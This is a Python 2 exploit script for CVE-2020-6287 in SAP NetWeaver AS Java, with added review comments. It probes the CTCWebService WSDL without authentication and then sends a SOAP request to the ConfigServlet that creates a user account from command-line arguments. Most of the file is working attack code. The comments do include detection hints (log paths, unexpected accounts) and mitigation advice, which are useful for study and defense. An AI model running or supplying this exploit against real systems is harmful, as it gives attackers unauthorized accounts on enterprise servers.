#from ducnt import <3
import requests
import base64
import sys


def check_vulnerable(_url):
	"""Report whether the CTCWebService WSDL answers an unauthenticated GET.

	Requests <_url>/CTCWebService/CTCWebServiceBean?wsdl with no credentials
	and treats an HTTP 200 whose body contains "urn:CTCWebServiceSi" as
	"Vulnerable". Prints the verdict and returns True/False accordingly.

	NOTE(review): this is a reachability heuristic. It shows that the endpoint
	served its WSDL without authentication; it does not read a version or
	patch level, so confirm the result against the system's applied fixes.
	TLS certificate validation is switched off (verify=False), so the answer
	is not bound to the identity of the host that replied.
	Connection errors and timeouts from requests are not caught here.
	"""
	probe_headers = {
		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
		"Accept-Language": "en-US,en;q=0.5",
		"Accept-Encoding": "gzip, deflate",
		"Content-Type": "text/xml;charset=UTF-8",
		"Connection": "close",
		"Upgrade-Insecure-Requests": "1",
	}
	wsdl_url = _url + "/CTCWebService/CTCWebServiceBean?wsdl"
	response = requests.get(wsdl_url, headers=probe_headers, verify=False, timeout=5)

	# Same two conditions, same evaluation order as before: marker first, then status.
	exposed = "urn:CTCWebServiceSi" in response.content and response.status_code == 200
	if not exposed:
		print "Not Vulnerable, matane :("
		return False

	print "Vulnerable"
	return True


def add_user(_url, _username, _passwd):
	"""Send the CVE-2020-6287 user-creation request if the probe succeeds.

	Calls check_vulnerable(_url) first and does nothing when it returns False.
	Otherwise POSTs a SOAP envelope to
	<_url>/CTCWebService/CTCWebServiceBean/ConfigServlet that invokes
	executeSynchronious with the SPC_UserManagement.cproc path and a
	base64-encoded "userDetails" XML document carrying _username and _passwd.
	No Authorization header or session cookie is sent with either request.

	Always returns None; the outcome is only printed.

	Defensive view: the traffic this produces is an unauthenticated GET of the
	WSDL followed by a POST to the ConfigServlet path whose body names
	SPC_UserManagement.cproc. HTTP access logs or a reverse proxy in front of
	the AS Java instance can match on those paths, and the result to look for
	on the server is a user account nobody in the organisation created.
	Mitigation is the vendor fix for CVE-2020-6287, or removing unauthenticated
	network reachability of /CTCWebService/ until it is applied.
	"""
	_check = check_vulnerable(_url)
	if _check:
		url = _url+"/CTCWebService/CTCWebServiceBean/ConfigServlet"

		# Same browser-like header set as the probe; nothing here authenticates the caller.
		_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

		# NOTE(review): the username and password are concatenated into the XML
		# without escaping, so characters such as '<' or '&' change the document.
		_payload = "<root>  <user>    <JavaOrABAP>java</JavaOrABAP>    <username>"+str(_username)+"</username>    <password>"+str(_passwd)+"</password>    <userType></userType>  </user></root>"
		# str.encode('base64') is a Python 2-only codec; the module-level base64 import is not used.
		_payload = _payload.encode('base64')
		_data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">  <soapenv:Header/>  <soapenv:Body>    <urn:executeSynchronious>        <identifier>          <component>sap.com/tc~lm~config~content</component>          <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>       </identifier>       <contextMessages>          <baData>"+str(_payload)+"</baData>          <name>userDetails</name>       </contextMessages>    </urn:executeSynchronious>   </soapenv:Body></soapenv:Envelope>"
		# verify=False: the TLS certificate of the responding host is not validated.
		r = requests.post(url, headers=_headers, verify=False, data=_data, timeout=10)

		# NOTE(review): this is the same marker-plus-200 test the probe uses. It shows
		# the web service replied, not that an account now exists; confirm on the
		# server side. Any other response is dropped without a message.
		if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
			# The password is echoed in clear text to stdout (terminal scrollback, captured logs).
			print "Add user successfully with credential:\nUsername: ",_username," ==== Password: ",_passwd
			print "Login at: \n",_url+"/nwa"

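def main():
	"""Read base URL, username and password from argv and call add_user.

	Prints a usage line and exits with status 1 when fewer than three
	positional arguments are given. Extra arguments are ignored.

	NOTE(review): the password is taken from the command line, so it is
	visible in the process list and shell history of the machine running
	the script.
	"""
	if len(sys.argv) < 4:
		# The URL placeholder was missing its closing '>' in the usage text.
		print "Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port> <username> <passwd>"
		# sys.exit instead of the site-provided exit(): it is always defined, and
		# a usage error now returns a non-zero status to the calling shell.
		sys.exit(1)
	_url, _username, _passwd = sys.argv[1:4]
	add_user(_url, _username, _passwd)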


# Run main() only when the file is executed as a script, so importing the
# module (for example to read check_vulnerable) sends no network traffic.
if __name__ == "__main__": 
	main()

